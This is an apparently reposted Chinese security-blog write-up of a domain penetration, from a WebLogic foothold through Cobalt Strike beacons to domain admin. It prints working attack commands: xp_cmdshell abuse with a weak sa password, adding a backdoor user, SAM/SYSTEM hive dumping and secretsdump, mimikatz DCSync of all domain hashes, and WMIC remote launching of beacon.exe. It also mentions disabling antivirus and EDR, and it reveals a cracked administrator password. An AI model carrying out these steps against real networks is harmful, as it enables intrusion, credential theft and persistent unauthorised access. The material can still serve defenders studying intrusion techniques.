记一次常规的域渗透

admin 2024年11月14日22:49:34评论10 views字数 1448阅读4分49秒阅读模式

记一次常规的域渗透

1.入口是weblogic,上线无杀软,不再赘述写webshell和下载马子的过程,因此直接到上线cs:

记一次常规的域渗透
记一次常规的域渗透

一上来不要大规模的扫描,先对网络环境进行信息收集,发现没有域环境:

systeminfo

记一次常规的域渗透

使用cs自带的mimikatz功能导出密码:

cs: logonpasswords

记一次常规的域渗透

对该网段使用该凭证进行pth横向(通过hash进行传递):

记一次常规的域渗透
记一次常规的域渗透

该网段均横向失败,对fscan扫描结果进行数据处理,发现内网存在域和exchange,且没有弱口令,尝试对扫描出来的17-010和spring漏洞测试均尝试失败:

记一次常规的域渗透
记一次常规的域渗透
记一次常规的域渗透
记一次常规的域渗透
记一次常规的域渗透

于是使用frp挂上代理进内网扫描弱口令

记一次常规的域渗透
记一次常规的域渗透

发现一个弱口令,尝试链接,成功登录并命令执行,但是是服务权限:

23.exe 20.20.20.17 sa sa@12345 master xp_cmdshell "whoami"

记一次常规的域渗透

使用自带的clr_efspotato,提权失败:

23.exe 20.20.20.17 sa sa@12345 master clr_efspotato "whoami"

记一次常规的域渗透

尝试使用SharpSQLTools上传提权文件,通过提权文件进行添加用户,远程桌面登陆后,手动执行beacon.exe

23.exe 20.20.20.17 sa sa@12345 master sourcefile destationfile

记一次常规的域渗透
记一次常规的域渗透

提权成功后接下来尝试添加用户:(这里引号需要转义,多加一个引号即可)

23.exe 20.20.20.17 sa sa@12345 master xp_cmdshell "cmd.exe /c 666.exe ""net user jijida admin!@#45""

记一次常规的域渗透

okkkkkkkkkk,尝试登录:

记一次常规的域渗透

发现卡巴斯基和edr,直接关闭:

记一次常规的域渗透

私密马赛,我没能关掉,尝试通过导出密码拿下高用户的权限:

reg save hklmsam sam.hivereg save hklmsystem system.hive

记一次常规的域渗透

本地secertdump解密这里我是从远程桌面托文件下来所以很卡,只选择下载了两个文件,security可以选择不下载:

python secretsdump.py -system system.hive  -sam sam.hive local

记一次常规的域渗透

administrator账户进行解密得到密码:@Nn031985

记一次常规的域渗透
记一次常规的域渗透

成功拿到管理员权限,在当前权限下继续使用当前账户进行横向:

记一次常规的域渗透

发现17,20,25,57都可以横向

在57上发现域环境:

记一次常规的域渗透

存在卡巴斯基,直接关闭,上传beacon.exe:

记一次常规的域渗透

上线cs:

记一次常规的域渗透

使用当前会话进行信息收集,导出密码的过程中发现一些邮箱口令:

记一次常规的域渗透

注入域管进程:

记一次常规的域渗透
记一次常规的域渗透

在域管进程下进行域环境的信息收集,先查域管:

net group "domain admins" /domain

记一次常规的域渗透

域成员:

net user /domain

记一次常规的域渗透

找域控:

ping dc

记一次常规的域渗透

这里不选择添加账户密码的话,默认选择当前权限(域管权限)进行横向:

wmic /mode:20.20.20.85 os get name

记一次常规的域渗透

导出域内所有用户hash,这里使用mimikatz自带的dcsync功能:

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

记一次常规的域渗透

20上有个exchange服务,尝试对20进行横向渗透:

记一次常规的域渗透

建立ipc链接后,使用UNC路径传马:

\ipC$

记一次常规的域渗透

成功上线:

wmic /node:20.20.20.20 process call create "cmd.exe /c beacon.exe"

记一次常规的域渗透
记一次常规的域渗透

传马子:

记一次常规的域渗透

上线:

记一次常规的域渗透

新建一个域管:

记一次常规的域渗透

3389尝试登录:

记一次常规的域渗透

记一次常规的域渗透

原文始发于微信公众号(雁行安全团队):记一次常规的域渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月14日22:49:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次常规的域渗透https://cn-sec.com/archives/1651164.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息